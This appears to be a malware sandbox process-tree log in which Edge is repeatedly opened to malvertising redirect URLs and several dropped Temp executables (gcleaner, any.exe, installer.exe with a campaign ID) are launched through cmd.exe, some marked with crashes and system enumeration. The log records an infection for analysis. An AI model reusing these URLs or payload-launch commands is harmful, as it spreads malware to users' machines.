C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46613⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e613⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721513⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311913⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe4,0xe8,0xdc,0xe0,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=313⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=313⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=133968013⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xc0,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=313⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xe4,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=134317813⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46513⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=46613⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e613⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad13⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0x78,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148313⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151313⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721513⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311913⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423113⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=313⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471814⤵
C:\Users\Admin\AppData\Local\Temp\9a-b7182-491-d25bb-707117f366f76\SHigaeloxica.exe"C:\Users\Admin\AppData\Local\Temp\9a-b7182-491-d25bb-707117f366f76\SHigaeloxica.exe"12⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3zgv0bbb.vnn\GcleanerEU.exe /eufive & exit13⤵
C:\Users\Admin\AppData\Local\Temp\3zgv0bbb.vnn\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\3zgv0bbb.vnn\GcleanerEU.exe /eufive14⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 49716 -s 24015⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l5pjkz0t.ixe\installer.exe /qn CAMPAIGN="654" & exit13⤵
C:\Users\Admin\AppData\Local\Temp\l5pjkz0t.ixe\installer.exeC:\Users\Admin\AppData\Local\Temp\l5pjkz0t.ixe\installer.exe /qn CAMPAIGN="654"14⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\43u2tlft.2vo\any.exe & exit13⤵
C:\Users\Admin\AppData\Local\Temp\43u2tlft.2vo\any.exeC:\Users\Admin\AppData\Local\Temp\43u2tlft.2vo\any.exe14⤵
C:\Users\Admin\AppData\Local\Temp\43u2tlft.2vo\any.exe"C:\Users\Admin\AppData\Local\Temp\43u2tlft.2vo\any.exe" -u15⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\clryhlav.51o\gcleaner.exe /mixfive & exit13⤵
C:\Users\Admin\AppData\Local\Temp\clryhlav.51o\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\clryhlav.51o\gcleaner.exe /mixfive14⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8984 -s 23615⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\511zxmyo.pfo\autosubplayer.exe /S & exit13⤵
- Suspicious use of SetWindowsHookEx
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g3xlarsx.cqq\GcleanerEU.exe /eufive & exit13⤵
C:\Users\Admin\AppData\Local\Temp\g3xlarsx.cqq\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\g3xlarsx.cqq\GcleanerEU.exe /eufive14⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6428 -s 23615⤵
- Program crash
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4ipbouhz.ns0\installer.exe /qn CAMPAIGN="654" & exit13⤵
C:\Users\Admin\AppData\Local\Temp\4ipbouhz.ns0\installer.exeC:\Users\Admin\AppData\Local\Temp\4ipbouhz.ns0\installer.exe /qn CAMPAIGN="654"14⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ovxzoxzb.pao\any.exe & exit13⤵
C:\Users\Admin\AppData\Local\Temp\ovxzoxzb.pao\any.exeC:\Users\Admin\AppData\Local\Temp\ovxzoxzb.pao\any.exe14⤵
C:\Users\Admin\AppData\Local\Temp\ovxzoxzb.pao\any.exe"C:\Users\Admin\AppData\Local\Temp\ovxzoxzb.pao\any.exe" -u15⤵
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xibq5u3u.ksn\gcleaner.exe /mixfive & exit13⤵
C:\Users\Admin\AppData\Local\Temp\xibq5u3u.ksn\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\xibq5u3u.ksn\gcleaner.exe /mixfive14⤵
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 49868 -s 24015⤵
- Program crash
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\chv35b53.tln\autosubplayer.exe /S & exit13⤵
C:\Users\Admin\Pictures\Adobe Films\8EqV4eNR78bCYwfbybj8MsVz.exe"C:\Users\Admin\Pictures\Adobe Films\8EqV4eNR78bCYwfbybj8MsVz.exe"9⤵
